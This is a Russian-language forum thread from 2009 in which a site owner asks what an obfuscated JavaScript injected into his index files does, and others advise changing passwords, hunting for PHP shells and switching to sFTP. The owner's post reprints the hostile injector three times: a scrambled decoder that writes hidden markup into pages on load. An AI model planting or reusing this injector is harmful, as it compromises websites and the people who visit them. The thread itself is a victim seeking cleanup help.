Мне установили вредоносный Java Script на index файлы

Тема в разделе ".:: Уязвимости", создана пользователем Toha20072008, 20 июл 2009.

Статус темы:
Закрыта.
  1. Toha20072008

    Toha20072008

    Заблокирован
    Регистр.:
    17 фев 2008
    Сообщения:
    316
    Симпатии:
    50
    Мне на сайт установили какой-то непонятный Java Script на index файлы сайта. На все разделы вкоторых есть файлы index.php и index.html - сейчас не важно то как они это сделали.

    Главный вопрос зачем это было нужно. Что делает этот код - который я приведу ниже.
    Код:
    <script>function OIOO10lOl1O1O00lII1IOlOIOO11IlIOllIl1111(I001OOOI1100OOI1IlO0llO1ll10O10lOllllI01){var II0OllIIOI1l00101I101001OI0O0I0lO01O0IIO=I001OOOI1100OOI1IlO0llO1ll10O10lOllllI01.length,lII1O00llO0II1IlO01lO0OO11l0IO0lIIIO0l1O=1024,l01OOOIOlOllOO1l11III0IO1OlO1IlllIllI10l,IIIlIIO1I1010OlI10OOIOI0O0lO01l00I0l1l1O,O1II0100111O001l0O0O1ll11ll01IlOIl11l0l0,II110l0lO00lOOll0I01111O1O0IIl0ll0IOl1lO=0,l0lOO0I1IO1O10llI0I0llO1I1IO0O0ll01llOII=0,O1l1IIl11OIIOI1OlO01lOl0Ill1OI0l0ll1O00O=0,IIll1OOIOOI0lOI1lIlOIl0ll11lIIlOOlI0I0lI=Array(63,3,50,51,57,55,35,16,27,21,0,0,0,0,0,0,14,44,60,13,22,19,43,37,30,23,59,53,49,31,56,9,29,12,45,18,7,8,42,38,6,34,17,0,0,0,0,52,0,4,39,28,40,41,0,46,48,1,47,2,10,54,5,58,36,25,26,61,15,32,33,24,62,20,11);for(IIIlIIO1I1010OlI10OOIOI0O0lO01l00I0l1l1O=Math.ceil(II0OllIIOI1l00101I101001OI0O0I0lO01O0IIO/lII1O00llO0II1IlO01lO0OO11l0IO0lIIIO0l1O);IIIlIIO1I1010OlI10OOIOI0O0lO01l00I0l1l1O>0;IIIlIIO1I1010OlI10OOIOI0O0lO01l00I0l1l1O--){O1II0100111O001l0O0O1ll11ll01IlOIl11l0l0=\'\';for(l01OOOIOlOllOO1l11III0IO1OlO1IlllIllI10l=Math.min(II0OllIIOI1l00101I101001OI0O0I0lO01O0IIO,lII1O00llO0II1IlO01lO0OO11l0IO0lIIIO0l1O);l01OOOIOlOllOO1l11III0IO1OlO1IlllIllI10l>0;l01OOOIOlOllOO1l11III0IO1OlO1IlllIllI10l--,II0OllIIOI1l00101I101001OI0O0I0lO01O0IIO--){O1l1IIl11OIIOI1OlO01lOl0Ill1OI0l0ll1O00O|=(IIll1OOIOOI0lOI1lIlOIl0ll11lIIlOOlI0I0lI[I001OOOI1100OOI1IlO0llO1ll10O10lOllllI01.charCodeAt(II110l0lO00lOOll0I01111O1O0IIl0ll0IOl1lO++)-48])<<l0lOO0I1IO1O10llI0I0llO1I1IO0O0ll01llOII;if(l0lOO0I1IO1O10llI0I0llO1I1IO0O0ll01llOII){O1II0100111O001l0O0O1ll11ll01IlOIl11l0l0+=String.fromCharCode(165^O1l1IIl11OIIOI1OlO01lOl0Ill1OI0l0ll1O00O&255);O1l1IIl11OIIOI1OlO01lOl0Ill1OI0l0ll1O00O>>=8;l0lOO0I1IO1O10llI0I0llO1I1IO0O0ll01llOII-=2}else{l0lOO0I1IO1O10llI0I0llO1I1IO0O0ll01llOII=6}}document.write(O1II0100111O001l0O0O1ll11ll01IlOIl11l0l0)}}OIOO10lOl1O1O00lII1IOlOIOO11IlIOllIl1111(\"q2BhIEQ2fIdKI8QWTmc_ZIsblVNKlFB2DjdLzFdKl2B2zrAhQFqhftQL7bc_TDd_QTc_C64v9HwvC1Q3k5c_wHwGTDdKZ3P2f64vi3AK9bQLc042ljQhTgqWl2BhIEQ2fjO\")</script><script>function OIOO10lOl1O1O00lII1IOlOIOO11IlIOllIl1111(I001OOOI1100OOI1IlO0llO1ll10O10lOllllI01){var II0OllIIOI1l00101I101001OI0O0I0lO01O0IIO=I001OOOI1100OOI1IlO0llO1ll10O10lOllllI01.length,lII1O00llO0II1IlO01lO0OO11l0IO0lIIIO0l1O=1024,l01OOOIOlOllOO1l11III0IO1OlO1IlllIllI10l,IIIlIIO1I1010OlI10OOIOI0O0lO01l00I0l1l1O,O1II0100111O001l0O0O1ll11ll01IlOIl11l0l0,II110l0lO00lOOll0I01111O1O0IIl0ll0IOl1lO=0,l0lOO0I1IO1O10llI0I0llO1I1IO0O0ll01llOII=0,O1l1IIl11OIIOI1OlO01lOl0Ill1OI0l0ll1O00O=0,IIll1OOIOOI0lOI1lIlOIl0ll11lIIlOOlI0I0lI=Array(63,3,50,51,57,55,35,16,27,21,0,0,0,0,0,0,14,44,60,13,22,19,43,37,30,23,59,53,49,31,56,9,29,12,45,18,7,8,42,38,6,34,17,0,0,0,0,52,0,4,39,28,40,41,0,46,48,1,47,2,10,54,5,58,36,25,26,61,15,32,33,24,62,20,11);for(IIIlIIO1I1010OlI10OOIOI0O0lO01l00I0l1l1O=Math.ceil(II0OllIIOI1l00101I101001OI0O0I0lO01O0IIO/lII1O00llO0II1IlO01lO0OO11l0IO0lIIIO0l1O);IIIlIIO1I1010OlI10OOIOI0O0lO01l00I0l1l1O>0;IIIlIIO1I1010OlI10OOIOI0O0lO01l00I0l1l1O--){O1II0100111O001l0O0O1ll11ll01IlOIl11l0l0=\'\';for(l01OOOIOlOllOO1l11III0IO1OlO1IlllIllI10l=Math.min(II0OllIIOI1l00101I101001OI0O0I0lO01O0IIO,lII1O00llO0II1IlO01lO0OO11l0IO0lIIIO0l1O);l01OOOIOlOllOO1l11III0IO1OlO1IlllIllI10l>0;l01OOOIOlOllOO1l11III0IO1OlO1IlllIllI10l--,II0OllIIOI1l00101I101001OI0O0I0lO01O0IIO--){O1l1IIl11OIIOI1OlO01lOl0Ill1OI0l0ll1O00O|=(IIll1OOIOOI0lOI1lIlOIl0ll11lIIlOOlI0I0lI[I001OOOI1100OOI1IlO0llO1ll10O10lOllllI01.charCodeAt(II110l0lO00lOOll0I01111O1O0IIl0ll0IOl1lO++)-48])<<l0lOO0I1IO1O10llI0I0llO1I1IO0O0ll01llOII;if(l0lOO0I1IO1O10llI0I0llO1I1IO0O0ll01llOII){O1II0100111O001l0O0O1ll11ll01IlOIl11l0l0+=String.fromCharCode(165^O1l1IIl11OIIOI1OlO01lOl0Ill1OI0l0ll1O00O&255);O1l1IIl11OIIOI1OlO01lOl0Ill1OI0l0ll1O00O>>=8;l0lOO0I1IO1O10llI0I0llO1I1IO0O0ll01llOII-=2}else{l0lOO0I1IO1O10llI0I0llO1I1IO0O0ll01llOII=6}}document.write(O1II0100111O001l0O0O1ll11ll01IlOIl11l0l0)}}OIOO10lOl1O1O00lII1IOlOIOO11IlIOllIl1111(\"q2BhIEQ2fIdKI8QWTmc_ZIsblVNKlFB2DjdLzFdKl2B2zrAhQFqhftQL7bc_TDd_QTc_C64v9HwvC1Q3k5c_wHwGTDdKZ3P2f64vi3AK9bQLc042ljQhTgqWl2BhIEQ2fjO\")</script><script>function OIOO10lOl1O1O00lII1IOlOIOO11IlIOllIl1111(I001OOOI1100OOI1IlO0llO1ll10O10lOllllI01){var II0OllIIOI1l00101I101001OI0O0I0lO01O0IIO=I001OOOI1100OOI1IlO0llO1ll10O10lOllllI01.length,lII1O00llO0II1IlO01lO0OO11l0IO0lIIIO0l1O=1024,l01OOOIOlOllOO1l11III0IO1OlO1IlllIllI10l,IIIlIIO1I1010OlI10OOIOI0O0lO01l00I0l1l1O,O1II0100111O001l0O0O1ll11ll01IlOIl11l0l0,II110l0lO00lOOll0I01111O1O0IIl0ll0IOl1lO=0,l0lOO0I1IO1O10llI0I0llO1I1IO0O0ll01llOII=0,O1l1IIl11OIIOI1OlO01lOl0Ill1OI0l0ll1O00O=0,IIll1OOIOOI0lOI1lIlOIl0ll11lIIlOOlI0I0lI=Array(63,3,50,51,57,55,35,16,27,21,0,0,0,0,0,0,14,44,60,13,22,19,43,37,30,23,59,53,49,31,56,9,29,12,45,18,7,8,42,38,6,34,17,0,0,0,0,52,0,4,39,28,40,41,0,46,48,1,47,2,10,54,5,58,36,25,26,61,15,32,33,24,62,20,11);for(IIIlIIO1I1010OlI10OOIOI0O0lO01l00I0l1l1O=Math.ceil(II0OllIIOI1l00101I101001OI0O0I0lO01O0IIO/lII1O00llO0II1IlO01lO0OO11l0IO0lIIIO0l1O);IIIlIIO1I1010OlI10OOIOI0O0lO01l00I0l1l1O>0;IIIlIIO1I1010OlI10OOIOI0O0lO01l00I0l1l1O--){O1II0100111O001l0O0O1ll11ll01IlOIl11l0l0=\'\';for(l01OOOIOlOllOO1l11III0IO1OlO1IlllIllI10l=Math.min(II0OllIIOI1l00101I101001OI0O0I0lO01O0IIO,lII1O00llO0II1IlO01lO0OO11l0IO0lIIIO0l1O);l01OOOIOlOllOO1l11III0IO1OlO1IlllIllI10l>0;l01OOOIOlOllOO1l11III0IO1OlO1IlllIllI10l--,II0OllIIOI1l00101I101001OI0O0I0lO01O0IIO--){O1l1IIl11OIIOI1OlO01lOl0Ill1OI0l0ll1O00O|=(IIll1OOIOOI0lOI1lIlOIl0ll11lIIlOOlI0I0lI[I001OOOI1100OOI1IlO0llO1ll10O10lOllllI01.charCodeAt(II110l0lO00lOOll0I01111O1O0IIl0ll0IOl1lO++)-48])<<l0lOO0I1IO1O10llI0I0llO1I1IO0O0ll01llOII;if(l0lOO0I1IO1O10llI0I0llO1I1IO0O0ll01llOII){O1II0100111O001l0O0O1ll11ll01IlOIl11l0l0+=String.fromCharCode(165^O1l1IIl11OIIOI1OlO01lOl0Ill1OI0l0ll1O00O&255);O1l1IIl11OIIOI1OlO01lOl0Ill1OI0l0ll1O00O>>=8;l0lOO0I1IO1O10llI0I0llO1I1IO0O0ll01llOII-=2}else{l0lOO0I1IO1O10llI0I0llO1I1IO0O0ll01llOII=6}}document.write(O1II0100111O001l0O0O1ll11ll01IlOIl11l0l0)}}OIOO10lOl1O1O00lII1IOlOIOO11IlIOllIl1111(\"q2BhIEQ2fIdKI8QWTmc_ZIsblVNKlFB2DjdLzFdKl2B2zrAhQFqhftQL7bc_TDd_QTc_C64v9HwvC1Q3k5c_wHwGTDdKZ3P2f64vi3AK9bQLc042ljQhTgqWl2BhIEQ2fjO\")</script>
    
     
  2. tostrss

    tostrss

    Регистр.:
    16 окт 2007
    Сообщения:
    771
    Симпатии:
    217


    меняй пароли, у тебя сидит вирус, через фтп-ифреймер зафреймили твои скрипты.
     
    Toha20072008 нравится это.
  3. Toha20072008

    Toha20072008

    Заблокирован
    Регистр.:
    17 фев 2008
    Сообщения:
    316
    Симпатии:
    50
    Первое что сделал это поменял все пароли.

    А зачем они это делают - чтобы получит контроль над сайтом и получить ФТП пароли?
     
  4. ask0n

    ask0n

    Регистр.:
    9 июн 2009
    Сообщения:
    227
    Симпатии:
    63
    Если они смогли внедрять код в твой индекс, то контроль над сайтом уже получен, теперь через твой сайт будут еще кому-то внедрять или уже внедрили...
     
  5. Toha20072008

    Toha20072008

    Заблокирован
    Регистр.:
    17 фев 2008
    Сообщения:
    316
    Симпатии:
    50
    Даже если я поменял пароли на ФТП и на все что можно было ??:eek:

    А как расшифровать этот скрипт который они мне установили??:(
     
  6. ask0n

    ask0n

    Регистр.:
    9 июн 2009
    Сообщения:
    227
    Симпатии:
    63
    Могли остаться php-шеллы. Нужно понять как был получен доступ, возможно есть уязвимость в движке, возможно у тебя на компе троян уже живет...

    https://www.nulled.ws/showthread.php?t=136101
     
    Toha20072008 нравится это.
  7. tostrss

    tostrss

    Регистр.:
    16 окт 2007
    Сообщения:
    771
    Симпатии:
    217
    я же тебе его расшифровал, смотри мой первый пост.
     
    Toha20072008 нравится это.
  8. Toha20072008

    Toha20072008

    Заблокирован
    Регистр.:
    17 фев 2008
    Сообщения:
    316
    Симпатии:
    50

    А как избавиться от PHP шелов - их по ФТП протоколу видно? Можно их удалить?
     
  9. tostrss

    tostrss

    Регистр.:
    16 окт 2007
    Сообщения:
    771
    Симпатии:
    217
    ты файлы своего сайта знаешь? проверь их. если есть лишние, то удаляй.
     
    Toha20072008 нравится это.
  10. admLoki

    admLoki генератор случайного PHP

    Регистр.:
    14 сен 2006
    Сообщения:
    481
    Симпатии:
    93
    sFTP надо использовать и мозг не трахать.
     
Статус темы:
Закрыта.